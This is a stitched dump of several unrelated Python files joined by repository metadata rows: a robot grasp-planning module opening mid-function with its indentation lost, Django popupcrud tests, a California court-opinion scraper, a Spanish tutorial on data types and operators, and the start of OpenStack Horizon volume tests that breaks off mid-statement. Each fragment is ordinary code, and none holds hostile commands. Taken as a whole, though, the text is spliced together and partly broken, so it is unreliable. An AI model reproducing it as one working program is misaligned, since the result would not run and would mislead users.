print("USE NORMAL. Start: ", curr_start_config)
else:
raise ValueError(
"check_kinematics: No handler for result status of {} implemented".format(res.status))
if all_steps_okay:
# if all steps are okay use original trajectory TODO only replace preceding steps!
stored_trajectories[(current_object_idx, current_ec_index)] = {}
pass
# Either the initial trajectory was possible or an alternative behavior was generated
return 1.0
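# Result layout (editorial note, not part of the original module): on success,
# stored_trajectories[(current_object_idx, current_ec_index)] maps each checked
# motion name (e.g. 'pre_approach', 'go_down') to an AlternativeBehavior; it is
# reset to an empty dict when every original step was reachable, and the
# function returns 0 as soon as one motion is infeasible and no alternative is
# found.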
def prepare_surface_grasp_parameter(objects, current_object_idx, object_params, params):
# use kinematic checks
# TODO create proxy; make it a persistent connection?
# Code duplication from planner.py TODO put at a shared location
# Set the initial pose above the object
goal_ = np.copy(object_params['frame']) # TODO: this should be support_surface_frame
goal_[:3, 3] = tra.translation_from_matrix(object_params['frame'])
goal_ = goal_.dot(params['hand_transform'])
# the grasp frame is symmetrical - check which side is nicer to reach
# this is a hacky first version for our WAM
zflip_transform = tra.rotation_matrix(math.radians(180.0), [0, 0, 1])
if goal_[0][0] < 0:
goal_ = goal_.dot(zflip_transform)
# hand pose above object
pre_grasp_pose = goal_.dot(params['pre_approach_transform'])
# down_dist = params['down_dist'] # dist lower than ifco bottom: behavior of the high level planner
# dist = z difference to object centroid (both transformations are w.r.t. to world frame
# (more realistic behavior since we have to touch the object for a successful grasp)
down_dist = pre_grasp_pose[2, 3] - object_params['frame'][2, 3] # get z-translation difference
# goal pose for go down movement
go_down_pose = tra.translation_matrix([0, 0, -down_dist]).dot(pre_grasp_pose)
post_grasp_pose = params['post_grasp_transform'].dot(
go_down_pose) # TODO it would be better to allow relative motion as goal frames
checked_motions = ["pre_approach",
"go_down"] # , "post_grasp_rot"] ,go_up, go_drop_off # TODO what about remaining motions? (see wallgrasp)
goals = [pre_grasp_pose, go_down_pose] # , post_grasp_pose]
# TODO what about using the bounding boxes as for automatic goal manifold calculation?
# Take orientation of object but translation of pre grasp pose
pre_grasp_pos_manifold = np.copy(object_params['frame'])
pre_grasp_pos_manifold[:3, 3] = tra.translation_from_matrix(pre_grasp_pose)
goal_manifold_frames = {
'pre_approach': pre_grasp_pos_manifold,
# Use object frame for resampling
'go_down': np.copy(object_params['frame']) # TODO change that again to go_down_pose!?
}
goal_manifold_orientations = {
# use hand orientation
'pre_approach': tra.quaternion_from_matrix(pre_grasp_pose),
# Use object orientation
'go_down': tra.quaternion_from_matrix(go_down_pose),
        # tra.quaternion_from_matrix(object_params['frame']) # TODO use hand orientation instead?
}
# The collisions that are allowed per motion in message format
allowed_collisions = {
# no collisions are allowed during going to pre_grasp pose
'pre_approach': [],
'go_down': [AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=current_object_idx,
terminating=True, required=True),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name='bottom', terminating=False)] +
[AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=obj_idx, terminating=False)
for obj_idx, o in enumerate(objects) if obj_idx != current_object_idx and
params['go_down_allow_touching_other_objects']
],
# TODO also account for the additional object in a way?
'post_grasp_rot': [AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=current_object_idx,
terminating=True),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name='bottom', terminating=False)]
}
print("ALLOWED COLLISIONS:", allowed_collisions)
return FeasibilityQueryParameters(checked_motions, goals, allowed_collisions, goal_manifold_frames,
goal_manifold_orientations)
def prepare_wall_grasp_parameter(ec_frame, selected_wall_name, objects, current_object_idx, object_params,
ifco_in_base_transform, params):
# hand pose above and behind the object
pre_approach_transform = params['pre_approach_transform']
wall_frame = np.copy(ec_frame)
wall_frame[:3, 3] = tra.translation_from_matrix(object_params['frame'])
# apply hand transformation
ec_hand_frame = wall_frame.dot(params['hand_transform'])
# ec_hand_frame = (ec_frame.dot(params['hand_transform']))
pre_approach_pose = ec_hand_frame.dot(pre_approach_transform)
# down_dist = params['down_dist'] # dist lower than ifco bottom: behavior of the high level planner
# dist = z difference to ifco bottom minus hand frame offset (dist from hand frame to collision point)
# (more realistic behavior since we have a force threshold when going down to the bottom)
bounded_down_dist = pre_approach_pose[2, 3] - ifco_in_base_transform[2, 3]
hand_frame_to_bottom_offset = 0.07 # 7cm TODO maybe move to handarm_parameters.py
bounded_down_dist = min(params['down_dist'], bounded_down_dist - hand_frame_to_bottom_offset)
# goal pose for go down movement
go_down_pose = tra.translation_matrix([0, 0, -bounded_down_dist]).dot(pre_approach_pose)
# pose after lifting. This is somewhat fake, since the real go_down_pose will be determined by
# the FT-Switch during go_down and the actual lifted distance by the TimeSwitch (or a pose switch in case
# the robot allows precise small movements) TODO better solution?
fake_lift_up_dist = np.min([params['lift_dist'], 0.01]) # 1cm
corrective_lift_pose = tra.translation_matrix([0, 0, fake_lift_up_dist]).dot(go_down_pose)
dir_wall = tra.translation_matrix([0, 0, -params['sliding_dist']])
# TODO sliding_distance should be computed from wall and hand frame.
# slide direction is given by the normal of the wall
wall_frame = np.copy(ec_frame)
dir_wall[:3, 3] = wall_frame[:3, :3].dot(dir_wall[:3, 3])
# normal goal pose behind the wall
slide_to_wall_pose = dir_wall.dot(corrective_lift_pose)
# now project it into the wall plane!
z_projection = np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]])
to_wall_plane_transform = wall_frame.dot(z_projection.dot(tra.inverse_matrix(wall_frame).dot(slide_to_wall_pose)))
slide_to_wall_pose[:3, 3] = tra.translation_from_matrix(to_wall_plane_transform)
# TODO remove code duplication with planner.py (refactor code snippets to function calls) !!!!!!!
checked_motions = ['pre_approach', 'go_down', 'corrective_lift',
'slide_to_wall'] # TODO overcome problem of FT-Switch after go_down
goals = [pre_approach_pose, go_down_pose, corrective_lift_pose, slide_to_wall_pose] # TODO see checked_motions
# Take orientation of object but translation of pre grasp pose
pre_grasp_pos_manifold = np.copy(object_params['frame'])
pre_grasp_pos_manifold[:3, 3] = tra.translation_from_matrix(pre_approach_pose)
slide_pos_manifold = np.copy(slide_to_wall_pose)
goal_manifold_frames = {
'pre_approach': pre_grasp_pos_manifold,
# Use object frame for sampling
'go_down': np.copy(go_down_pose),
'corrective_lift': np.copy(corrective_lift_pose),
# should always be the same frame as go_down # TODO use world orientation?
# Use wall frame for sampling. Keep in mind that the wall frame has different orientation, than world.
'slide_to_wall': slide_pos_manifold,
}
goal_manifold_orientations = {
# use hand orientation
'pre_approach': tra.quaternion_from_matrix(pre_approach_pose),
# Use object orientation
        'go_down': tra.quaternion_from_matrix(go_down_pose), # TODO use hand orientation instead?
# should always be the same orientation as go_down
'corrective_lift': tra.quaternion_from_matrix(corrective_lift_pose),
# use wall orientation
'slide_to_wall': tra.quaternion_from_matrix(wall_frame),
}
allowed_collisions = {
# 'init_joint': [],
# no collisions are allowed during going to pre_grasp pose
'pre_approach': [],
# Only allow touching the bottom of the ifco
'go_down': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
'corrective_lift': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
        # TODO also allow all other objects to be touched during sliding motion
'slide_to_wall': [
# Allow all other objects to be touched as well
# (since hand will go through them in simulation) TODO desired behavior?
AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=obj_idx,
terminating=False, required=obj_idx == current_object_idx)
for obj_idx in range(0, len(objects))
] + [
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name=selected_wall_name, terminating=False),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
}
return FeasibilityQueryParameters(checked_motions, goals, allowed_collisions, goal_manifold_frames,
goal_manifold_orientations)
def prepare_corner_grasp_parameter(ec_frame, selected_wall_names, objects, current_object_idx, object_params,
ifco_in_base_transform, params):
# hand pose above and behind the object
pre_approach_transform = params['pre_approach_transform']
corner_frame = np.copy(ec_frame)
print("Prepare Corner: ", pu.tf_dbg_call_to_string(corner_frame, "prepare"))
used_ec_frame, corner_frame_alpha_zero = GraspFrameRecipes.get_derived_corner_grasp_frames(corner_frame,
object_params['frame'])
pre_approach_pose = used_ec_frame.dot(params['hand_transform'].dot(pre_approach_transform)) # TODO order of hand and pre_approach
# down_dist = params['down_dist'] # dist lower than ifco bottom: behavior of the high level planner
# dist = z difference to ifco bottom minus hand frame offset (dist from hand frame to collision point)
# (more realistic behavior since we have a force threshold when going down to the bottom)
bounded_down_dist = pre_approach_pose[2, 3] - ifco_in_base_transform[2, 3]
hand_frame_to_bottom_offset = 0.07 # 7cm TODO maybe move to handarm_parameters.py
bounded_down_dist = min(params['down_dist'], bounded_down_dist - hand_frame_to_bottom_offset)
# goal pose for go down movement
go_down_pose = tra.translation_matrix([0, 0, -bounded_down_dist]).dot(pre_approach_pose)
# pose after lifting. This is somewhat fake, since the real go_down_pose will be determined by
# the FT-Switch during go_down and the actual lifted distance by the TimeSwitch (or a pose switch in case
# the robot allows precise small movements) TODO better solution?
fake_lift_up_dist = np.min([params['lift_dist'], 0.01]) # 1cm
corrective_lift_pose = tra.translation_matrix([0, 0, fake_lift_up_dist]).dot(go_down_pose)
sliding_dist = params['sliding_dist']
wall_dir = tra.translation_matrix([0, 0, -sliding_dist])
# slide direction is given by the corner_frame_alpha_zero
wall_dir[:3, 3] = corner_frame_alpha_zero[:3, :3].dot(wall_dir[:3, 3])
slide_to_wall_pose = wall_dir.dot(corrective_lift_pose)
# now project it into the wall plane!
z_projection = np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]])
to_wall_plane_transform = corner_frame_alpha_zero.dot(z_projection.dot(tra.inverse_matrix(corner_frame_alpha_zero).dot(slide_to_wall_pose)))
slide_to_wall_pose[:3, 3] = tra.translation_from_matrix(to_wall_plane_transform)
checked_motions = ['pre_approach', 'go_down', 'corrective_lift', 'slide_to_wall']
goals = [pre_approach_pose, go_down_pose, corrective_lift_pose, slide_to_wall_pose]
# Take orientation of object but translation of pre grasp pose
pre_grasp_pos_manifold = np.copy(object_params['frame'])
pre_grasp_pos_manifold[:3, 3] = tra.translation_from_matrix(pre_approach_pose)
slide_pos_manifold = np.copy(slide_to_wall_pose)
goal_manifold_frames = {
'pre_approach': pre_grasp_pos_manifold,
# Use object frame for sampling
'go_down': np.copy(go_down_pose),
'corrective_lift': np.copy(corrective_lift_pose),
# should always be the same frame as go_down # TODO use world orientation?
# Use wall frame for sampling. Keep in mind that the wall frame has different orientation, than world.
'slide_to_wall': slide_pos_manifold,
}
goal_manifold_orientations = {
# use hand orientation
'pre_approach': tra.quaternion_from_matrix(pre_approach_pose),
# Use object orientation
        'go_down': tra.quaternion_from_matrix(go_down_pose), # TODO use hand orientation instead?
# should always be the same orientation as go_down
'corrective_lift': tra.quaternion_from_matrix(corrective_lift_pose),
# use wall orientation
'slide_to_wall': tra.quaternion_from_matrix(corner_frame), # TODO is that the right one?
}
allowed_collisions = {
# 'init_joint': [],
# no collisions are allowed during going to pre_grasp pose
'pre_approach': [],
# Only allow touching the bottom of the ifco
'go_down': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
'corrective_lift': [AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
'slide_to_wall': [
# Allow all other objects to be touched as well
# (since hand will go through them in simulation)
AllowedCollision(type=AllowedCollision.BOUNDING_BOX, box_id=obj_idx,
terminating=False, required=obj_idx == current_object_idx)
for obj_idx in range(0, len(objects))
] + [
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name=selected_wall_names[0], terminating=False),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT,
constraint_name=selected_wall_names[1], terminating=False),
AllowedCollision(type=AllowedCollision.ENV_CONSTRAINT, constraint_name='bottom',
terminating=False),
],
}
return FeasibilityQueryParameters(checked_motions, goals, allowed_collisions, goal_manifold_frames,
goal_manifold_orientations)
| bsd-3-clause | -5,692,163,671,882,151,000 | 48.126198 | 147 | 0.632426 | false |
harikvpy/django-popupcrud | test/tests.py | 1 | 14507 | # -*- coding: utf-8 -*-
# pylint: skip-file
import re
import json
from django.test import TestCase
from django.http import JsonResponse
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
import six
from .models import Author, Book
from .views import AuthorCrudViewset, BookCrudViewset, BookUUIDCrudViewSet
RE_CREATE_EDIT_FORM = r"\n<form class=\'form-horizontal\' id=\'create-edit-form\' action=\'{0}\' method=\'post\' accept-charset=\'utf-8\'>.*</form>"
MODAL_PATTERNS = [
r'<div class="modal fade".*id="create-edit-modal"',
r'<div class="modal fade".*id="delete-modal"',
r'<div class="modal fade".*id="action-result-modal"',
r'<div class="modal fade".*id="add-related-modal"',
]
class PopupCrudViewSetTests(TestCase):
def test_settings(self):
from popupcrud.views import POPUPCRUD
self.assertEquals(POPUPCRUD['base_template'], "test/base.html")
def test_template(self):
author = Author.objects.create(name="John", age=26)
response = self.client.get(reverse("authors"))
self.assertTemplateUsed(response, "popupcrud/list.html")
# template should have the three embedded bootstrap modals
for pattern in MODAL_PATTERNS:
self.assertTrue(
re.search(pattern, response.content.decode('utf-8')))
def test_list_display(self):
name = "John"
author = Author.objects.create(name=name, age=26)
response = self.client.get(reverse("authors"))
html = response.content.decode('utf-8')
self.assertTrue(
re.search(r'<th.*sortable.*>.*Name.*</th>', html, re.DOTALL))
self.assertTrue(
re.search(r'<th.*sortable.*>.*Age.*</th>', html, re.DOTALL))
self.assertTrue(
re.search(r'<th.*sortable.*>.*Half Age.*</th>', html, re.DOTALL))
self.assertTrue(
re.search(r'<th.*Double Age.*</th>', html, re.DOTALL))
self.assertFalse(
re.search(r'<th.*sortable.*>.*DOUBLE AGE.*</th>', html, re.DOTALL))
# also tests the get_obj_name() method
first_col = """<a name="object_detail" data-url="{0}" data-title="Author Detail" href="javascript:void(0);">{1}</a><div data-name=\'{1}\'></div>"""
self.assertContains(
response,
first_col.format(
reverse("author-detail", kwargs={'pk': author.pk}),
name)
)
self.assertContains(response, "<td>26</td>")
self.assertContains(response, "<td>13</td>") # Author.half_age
self.assertContains(response, "<td>52</td>") # AuthorCrudViewSet.double_age
# test half_age field header has sortable as it has 'order_field'
# attribute.
def test_get_obj_name(self):
# Also tests that unicode characters are rendered correctly
name = "何瑞理"
author = Author.objects.create(name=name, age=46)
response = self.client.get(reverse("authors"))
first_col = """<a name="object_detail" data-url="{0}" data-title="Author Detail" href="javascript:void(0);">{1}</a><div data-name=\'{1}\'></div>"""
self.assertContains(
response,
first_col.format(
reverse("author-detail", kwargs={'pk': author.pk}),
name)
)
# "<div data-name=\'Peter Parker - 46\'></div>")
def test_page_title(self):
author = Author.objects.create(name="John", age=26)
response = self.client.get(reverse("authors"))
self.assertEquals(response.context['page_title'], "Author List")
def test_empty_data(self):
response = self.client.get(reverse("authors"))
self.assertNotContains(response, "<table class='table")
self.assertNotContains(response, "<th>Name</th>")
self.assertNotContains(response, "<th>Age</th>")
self.assertContains(response, "No records found")
def test_object_access_through_pk_urls(self):
'''Test CRUDViewset view access using object.pk based urls'''
for _ in range(0, 10):
Author.objects.create(name="John", age=25)
response = self.client.get(reverse("authors"))
self.assertContains(response, "New Author")
self.assertContains(response, AuthorCrudViewset.new_url)
for obj in Author.objects.all():
self.assertContains(response, AuthorCrudViewset().get_edit_url(obj))
self.assertContains(response, AuthorCrudViewset().get_delete_url(obj))
self.assertContains(response, AuthorCrudViewset().get_detail_url(obj))
def test_object_access_through_slug_urls(self):
'''Test CRUDViewset view access using slug_field based urls'''
john = Author.objects.create(name='Peter', age=25)
for index in range(1, 10):
Book.objects.create(title='Title %d' % index, author=john)
response = self.client.get(reverse("uuidbooks:list"))
self.assertContains(response, BookUUIDCrudViewSet.new_url)
for obj in Book.objects.all():
self.assertContains(response, BookUUIDCrudViewSet().get_edit_url(obj))
self.assertContains(response, BookUUIDCrudViewSet().get_delete_url(obj))
self.assertContains(response, BookUUIDCrudViewSet().get_detail_url(obj))
def test_pagination(self):
for _ in range(0, 30):
Author.objects.create(name="John", age=25)
response = self.client.get(reverse("authors"))
po = response.context['page_obj']
self.assertEqual(po.number, 1)
self.assertTrue(po.has_next())
self.assertFalse(po.has_previous())
self.assertEqual(po.paginator.num_pages, 3)
def test_create_form_template(self):
# when requested through an AJAX, should only contain the <form></form>
url = reverse("new-author")
response = self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
match = re.search(RE_CREATE_EDIT_FORM.format(url),
response.content.decode('utf-8'), re.DOTALL)
self.assertEqual(match.pos, 0)
def test_update_form_template(self):
# when requested through an AJAX, should only contain the <form></form>
john = Author.objects.create(name="John", age=25)
url = reverse("edit-author", kwargs={'pk': john.pk})
response = self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
match = re.search(RE_CREATE_EDIT_FORM.format(url),
response.content.decode('utf-8'), re.DOTALL)
self.assertEqual(match.pos, 0)
def test_create(self):
url = reverse("new-author")
response = self.client.post(
url,
data={'name': 'John', 'age': 55},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
john = Author.objects.get(name='John', age=55)
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'name': 'John', 'pk': john.pk})
def test_update(self):
john = Author.objects.create(name="John", age=25)
url = reverse("edit-author", kwargs={'pk': john.pk})
response = self.client.post(
url,
data={'name': 'Peter', 'age': 35},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'name': 'Peter', 'pk': john.pk})
john.refresh_from_db()
self.assertEquals(john.name, 'Peter')
def test_detail(self):
john = Author.objects.create(name="John", age=25)
url = reverse("author-detail", kwargs={'pk': john.pk})
response = self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertTemplateUsed(response, "popupcrud/detail_inner.html")
self.assertContains(response, "John")
def test_legacy_crud_boolean(self):
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = True
response = self.client.get(reverse("authors"))
for pattern in MODAL_PATTERNS:
self.assertIsNone(
re.search(pattern, response.content.decode('utf-8')))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_crud_dict_create(self):
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'create': True
}
response = self.client.get(reverse("authors"))
# New Author button's href should be AuthorCrudViewset.new_url's value,
# and not 'javascript:void(0)'
NEW_BUTTON_RE = r'<a.*class="btn btn-primary".*href="%s.*">' % \
str(AuthorCrudViewset.new_url)
self.assertTrue(re.search(NEW_BUTTON_RE,
response.content.decode('utf-8'), re.DOTALL))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_crud_dict_create_n_update(self):
john = Author.objects.create(name="John", age=25)
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'create': True,
'update': True
}
response = self.client.get(reverse("authors"))
# create_edit_modal modal dialog should not exist
self.assertIsNone(
re.search(MODAL_PATTERNS[0], response.content.decode('utf-8')))
self.assertIsNone(
re.search(MODAL_PATTERNS[3], response.content.decode('utf-8')))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_crud_dict_detail(self):
name = "John"
john = Author.objects.create(name=name, age=25)
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'detail': True,
}
response = self.client.get(reverse("authors"))
# All the modal dialog's should be present, but Detail view should
# point to the detail url and not javascript:void(0)
for pattern in MODAL_PATTERNS:
self.assertIsNotNone(
re.search(pattern, response.content.decode('utf-8')))
# note href != "javascript:void(0)"
ITEM_DETAIL_RE = r'<a href="{0}".*>{1}</a>'.format(
reverse("author-detail", kwargs={'pk': john.pk}),
name)
self.assertIsNotNone(
re.search(ITEM_DETAIL_RE, response.content.decode('utf-8')))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_create_contains_add_related_modal(self):
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'create': True
}
response = self.client.get(reverse("new-author"))
# modal id=add_related_modal pattern should exist in response
self.assertIsNotNone(
re.search(MODAL_PATTERNS[3], response.content.decode('utf-8')))
    def test_viewset_urls_generation(self):
        # default arguments generate all views
urls = BookCrudViewset.urls()
for pattern in urls[0]:
self.assertTrue(pattern.name in ('list', 'create', 'detail', 'update', 'delete'))
# namespace defaults to model's verbose_name_plural
self.assertEqual(urls[2], 'books')
urls = BookCrudViewset.urls(views=('create', 'detail'))
for pattern in urls[0]:
self.assertTrue(pattern.name in ('list', 'create', 'detail'))
urls = BookCrudViewset.urls(views=('update', 'delete'))
for pattern in urls[0]:
self.assertTrue(pattern.name in ('list', 'update', 'delete'))
# test namespace argument
urls = BookCrudViewset.urls(namespace='titles')
self.assertEqual(urls[2], 'titles')
def test_viewset_urls(self):
# Integration test for urls(). Verify that the generated CRUD urls are
# registered in URLconf correctly.
name = "John"
john = Author.objects.create(name=name, age=25)
book = Book.objects.create(title='Title', author=john)
self.assertIsNotNone(reverse("books:list"))
self.assertIsNotNone(reverse("books:create"))
self.assertIsNotNone(reverse("books:detail", kwargs={'pk': book.pk}))
self.assertIsNotNone(reverse("books:update", kwargs={'pk': book.pk}))
self.assertIsNotNone(reverse("books:delete", kwargs={'pk': book.pk}))
def test_item_action_links(self):
"""
Tests that item custom action links are added to standard action
items for each row in the list.
"""
name = "John"
john = Author.objects.create(name=name, age=25)
peter = Author.objects.create(name="Peter", age=30)
book1 = Book.objects.create(title='Title 1', author=john)
book2 = Book.objects.create(title='Title 2', author=peter)
response = self.client.get(reverse("books:list"))
item_action = "<a name=\'custom_action\' href=\'javascript:void(0);\' title=\'{0}\' data-action=\'{1}\' data-obj=\'{2}\'><span class=\'{3}\'></span></a>"
for book in response.context['object_list']:
up_pattern = item_action.format(
"Up", "0", book1.pk, "glyphicon glyphicon-ok")
down_pattern = item_action.format(
"Down", "1", book2.pk, "glyphicon glyphicon-remove")
self.assertContains(response, up_pattern)
self.assertContains(response, down_pattern)
def test_item_action(self):
"""
Test that item custom action POST request results in a call to the
CrudViewSet method specified.
We cannot test JavaScript from unit test framework, but we can simulate
the relevant JS script behavior and run through the backend python code
for custom item actions.
"""
name = "John"
john = Author.objects.create(name=name, age=25)
book = Book.objects.create(title='Title 1', author=john)
response = self.client.post(reverse("books:list"), data={
'action': '0', 'item': book.pk})
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'result': True,
'message': "Up vote successful"})
response = self.client.post(reverse("books:list"), data={
'action': '1', 'item': book.pk})
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'result': True,
'message': "Down vote successful"})
| bsd-3-clause | 748,750,833,190,306,800 | 43.894737 | 161 | 0.613337 | false |
brianwc/juriscraper | opinions/united_states/state/cal.py | 1 | 1498 | from juriscraper.OpinionSite import OpinionSite
import re
import time
from datetime import date
class Site(OpinionSite):
def __init__(self):
super(Site, self).__init__()
self.url = 'http://www.courtinfo.ca.gov/cgi-bin/opinions-blank.cgi?Courts=S'
self.court_id = self.__module__
def _get_case_names(self):
case_names = []
for name in self.html.xpath('//table/tr/td[3]/text()'):
date_regex = re.compile(r' \d\d?\/\d\d?\/\d\d| filed')
if 'P. v. ' in date_regex.split(name)[0]:
case_names.append(date_regex.split(name)[0].replace("P. ", "People "))
else:
case_names.append(date_regex.split(name)[0])
return case_names
def _get_download_urls(self):
return [t for t in self.html.xpath("//table/tr/td[2]/a/@href[contains(.,'PDF')]")]
def _get_case_dates(self):
dates = []
for s in self.html.xpath('//table/tr/td[1]/text()'):
s = s.strip()
date_formats = ['%b %d %Y', '%b %d, %Y']
for format in date_formats:
try:
dates.append(date.fromtimestamp(time.mktime(time.strptime(s, format))))
except ValueError:
pass
return dates
def _get_docket_numbers(self):
return [t for t in self.html.xpath('//table/tr/td[2]/text()[1]')]
def _get_precedential_statuses(self):
return ['Published'] * len(self.case_names)
| bsd-2-clause | 7,258,131,139,515,015,000 | 34.666667 | 91 | 0.548732 | false |
Jav10/Python | C-digosPython/VarTipo1.py | 1 | 1449 | #Variables y tipos de datos
#Autor: Javier Arturo Hernández Sosa
#Fecha: 28/Ago/2017
#Descripcion: Curso Python FES Acatlán
#Tipos de datos
numero = 5 #Operador de asignación
numero2 = 19
numeroFlotante = 25.0
cadena = "Hola Mundo"
boleano1 = True
boleano2 = False
complejo1 = 5 - 3j
complejo2 = 2 + 5j
# Common operations: +, -, /, //, %, *, **
print(numero+numeroFlotante)
print(numero-numero2)
print(19/5)  # True (classic) division returns a float
print(19//3)  # Floor division discards the fraction
print(19%5)  # Modulo operator returns the remainder
print(numero*numero2)
print(3**2)  # Power: 3 raised to the power of 2
# String operations
print(cadena*5)
print(cadena+cadena)  # Concatenation
print(cadena+" "+"Continua")
# Booleans
print(boleano1)
print(boleano2)
# Logical operators
print(boleano1 & boleano2) #and
print(boleano1 & boleano1)
print(boleano1 | boleano2) #or
print(boleano2 | boleano2)
print(not boleano1)
print(boleano1 ^ boleano2)  # xor: true if the values differ, false if they are equal
# Comparison operators
print(2==3)
print(6==6)
print("Hola"!="hola")
print("hola"<"dromedario")
print("hola">"zromedario")
print("Hormiga">="Hola")
print("Cono"<="Vaca")
# Type conversion
# Use type() to find out the data type
print(type("Oso"))
print(type(int(5.89)))
print(type(5.89))
print(type(str(567)))
# This is an error: print(int("oso"))
# Complex numbers
print(complejo1 + complejo2)
| mit | 5,351,169,964,645,992,000 | 25.132075 | 92 | 0.716968 | false |
openstack/horizon | openstack_dashboard/dashboards/project/volumes/tests.py | 1 | 96001 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from django.conf import settings
from django.forms import widgets
from django.template.defaultfilters import slugify
from django.test.utils import override_settings
from django.urls import reverse
from django.utils.http import urlunquote
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
import tables as volume_tables
from openstack_dashboard.dashboards.project.volumes import tabs
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
DETAIL_URL = ('horizon:project:volumes:detail')
INDEX_URL = reverse('horizon:project:volumes:index')
SEARCH_OPTS = dict(status=api.cinder.VOLUME_STATE_AVAILABLE)
ATTACHMENT_ID = '6061364b-6612-48a9-8fee-1a38fe072547'
class VolumeIndexViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
api.cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits',
'group_list'],
})
def _test_index(self, with_attachments=False, with_groups=False):
vol_snaps = self.cinder_volume_snapshots.list()
volumes = self.cinder_volumes.list()
if with_attachments:
server = self.servers.first()
else:
for volume in volumes:
volume.attachments = []
self.mock_volume_backup_supported.return_value = False
if with_groups:
self.mock_group_list.return_value = self.cinder_groups.list()
volumes = self.cinder_group_volumes.list()
self.mock_volume_list_paged.return_value = [volumes, False, False]
if with_attachments:
self.mock_server_get.return_value = server
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(INDEX_URL)
if with_attachments:
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_snapshot_list.assert_called_once()
if with_groups:
self.mock_group_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_backup_supported.assert_called_with(
test.IsHttpRequest())
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None, search_opts=None,
sort_dir='desc', paginate=True)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
def test_index_with_volume_attachments(self):
self._test_index(True)
def test_index_no_volume_attachments(self):
self._test_index(False)
def test_index_with_volume_groups(self):
self._test_index(with_groups=True)
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
cinder: ['tenant_absolute_limits',
'volume_list_paged',
'volume_backup_supported',
'volume_snapshot_list'],
})
def _test_index_paginated(self, marker, sort_dir, volumes, url,
has_more, has_prev):
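        # Shared driver for the pagination tests: it stubs the cinder/nova
        # calls, fetches ``url`` and checks that volume_list_paged was queried
        # with the expected marker and sort direction.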
backup_supported = True
vol_snaps = self.cinder_volume_snapshots.list()
server = self.servers.first()
self.mock_volume_backup_supported.return_value = backup_supported
self.mock_volume_list_paged.return_value = [volumes,
has_more, has_prev]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(urlunquote(url))
self.assertEqual(2, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=marker, sort_dir=sort_dir,
search_opts=None, paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
